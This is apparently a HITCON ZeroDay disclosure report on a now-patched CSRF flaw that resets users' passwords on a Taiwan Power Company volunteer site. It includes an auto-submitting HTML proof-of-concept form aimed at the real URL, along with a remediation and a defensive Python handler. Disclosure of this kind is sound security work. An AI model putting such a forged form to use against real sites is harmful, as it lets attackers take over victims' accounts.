Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00648
- Vendor: 台灣電力公司 (Taiwan Power Company)
- Title: [Bounty] 台灣電力公司 (Taiwan Power Company): CSRF resets a user's password
- Introduction: CSRF allows a user's password to be reset
Handling status
- Current status: Public
- Last Update: 2022/11/01
- Workflow stages: New submission, Reviewed, Reported, Patched, Retested, Public
Handling history
- 2022/08/13 17:18:00: New submission (status updated by ccoozzyy)
- 2022/08/16 01:12:24: Under review (status updated by the HITCON ZeroDay service team)
- 2022/10/31 10:53:24: Retest requested (status updated by the HITCON ZeroDay service team)
- 2022/10/31 22:01:46: Confirmed patched (status updated by ccoozzyy)
- 2022/11/01 03:00:04: Public (updated automatically by the HITCON ZeroDay platform)
Details
- ZDID: ZD-2022-00648
- Reporter: ccoozzyy (ccoozzyy)
- Risk: Medium
- Type: Cross-Site Request Forgery (CSRF)
References
An attacker can use this vulnerability to take malicious control of a user's account and perform actions on the user's behalf.
Vulnerability description: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Countermeasures: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(The information in this field is generated automatically by the system from the vulnerability category and is provided as reference material.)
Related URL
https://volunteer.taipower.com.tw/vms/mysite/vol_see.aspx?mode=pwd
Description
- Log in to the target under test, then go to 個人專區 (My Area) > 修改密碼 (Change Password).
- Observe that the password-change request carries no CSRF token and does not require the current password, so a new password can be set directly.
- Record a CSRF PoC for the password change (the __VIEWSTATE value is elided here):

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://volunteer.taipower.com.tw/vms/mysite/vol_see.aspx?mode=pwd" method="POST">
      <input type="hidden" name="__EVENTTARGET" value="" />
      <input type="hidden" name="__EVENTARGUMENT" value="" />
      <input type="hidden" name="__VIEWSTATE" value="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" />
      <input type="hidden" name="__VIEWSTATEGENERATOR" value="601DFF1F" />
      <input type="hidden" name="__SCROLLPOSITIONX" value="0" />
      <input type="hidden" name="__SCROLLPOSITIONY" value="0" />
      <input type="hidden" name="__EVENTVALIDATION" value="nMvQr8n71ASk3I4GM8Js8JtHxqayp8r9L3913Nb2rLALSa+4SW0pNaPLz3xweDCrxtRAjdyBHv/KCI+egBZGTd22y0frvKzji5jLit0brDeTSfbWVB9FxVGtizGZXGbKB+akvdxdbrJ7BkcrYLTj+B4lOc6vwdDuz+dYekNTZTKBGs2i" />
      <input type="hidden" name="ctl00$ContentPlaceHolder2$txtPassword" value="csrfpassword" />
      <input type="hidden" name="ctl00$ContentPlaceHolder2$txtConfirm" value="csrfpassword" />
      <input type="hidden" name="ctl00$ContentPlaceHolder2$Button1" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

- Log in again, making sure the previous session has already been invalidated.
- After the victim logs in again and clicks the malicious link, the victim's password is changed without the victim's knowledge.
- The password change succeeds.
Remediation
Require the user to enter the current password for confirmation when changing the password.
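As an added illustration of the remediation above (example code, not the affected site's own), a hardened password-change handler in Python that rejects the report's auto-submitted form: it checks a per-session synchronizer token, as the referenced OWASP cheat sheet recommends, in addition to the current-password confirmation the remediation calls for. The in-memory user store, the session object and the field names csrf_token and txtCurrentPassword are assumptions; txtPassword and txtConfirm mirror the PoC form.

```python
import hashlib
import hmac
import secrets

# Constructed example, not the affected site's code. txtPassword/txtConfirm
# come from the report's PoC form; csrf_token and txtCurrentPassword are the
# two fields this hardened handler assumes the fixed form adds.
SALT = b"constructed-demo-salt"  # single salt for brevity; use per-user salts in practice

def hash_password(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)

def new_session(user: str) -> dict:
    """Authenticated session carrying a fresh synchronizer token."""
    return {"user": user, "csrf_token": secrets.token_urlsafe(32)}

def change_password(users: dict, session: dict, form: dict) -> tuple[bool, str]:
    """Return (ok, reason). The cheap token check runs before the password hash."""
    # 1. Synchronizer token: a cross-site page cannot read the victim's token,
    #    so the report's auto-submitting form fails here.
    if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf_token"]):
        return False, "missing or invalid CSRF token"
    # 2. Re-authentication (the page's remediation): the attacker does not know
    #    the current password even if a token were somehow obtained.
    supplied = hash_password(form.get("txtCurrentPassword", ""))
    if not hmac.compare_digest(supplied, users[session["user"]]):
        return False, "current password incorrect"
    # 3. The original form's own check: new password and confirmation match.
    new, confirm = form.get("txtPassword", ""), form.get("txtConfirm", "")
    if not new or new != confirm:
        return False, "new password and confirmation do not match"
    users[session["user"]] = hash_password(new)
    session["csrf_token"] = secrets.token_urlsafe(32)  # rotate after a sensitive action
    return True, "password changed"

# The PoC's POST body: the victim's session cookie rides along automatically,
# but the attacker can only pre-fill these fields.
POC_FORM = {"txtPassword": "csrfpassword", "txtConfirm": "csrfpassword", "Button1": ""}

def demo() -> list:
    """Forged request, then a wrong-current-password attempt, then a legitimate change."""
    users = {"vol001": hash_password("OldPassw0rd!")}  # constructed user store
    sess = new_session("vol001")
    forged = change_password(users, sess, POC_FORM)
    wrong_old = change_password(users, sess, {**POC_FORM, "csrf_token": sess["csrf_token"],
                                              "txtCurrentPassword": "guess"})
    legit = change_password(users, sess, {**POC_FORM, "csrf_token": sess["csrf_token"],
                                          "txtCurrentPassword": "OldPassw0rd!"})
    return [forged, wrong_old, legit]

if __name__ == "__main__":
    for result in demo():
        print(result)
```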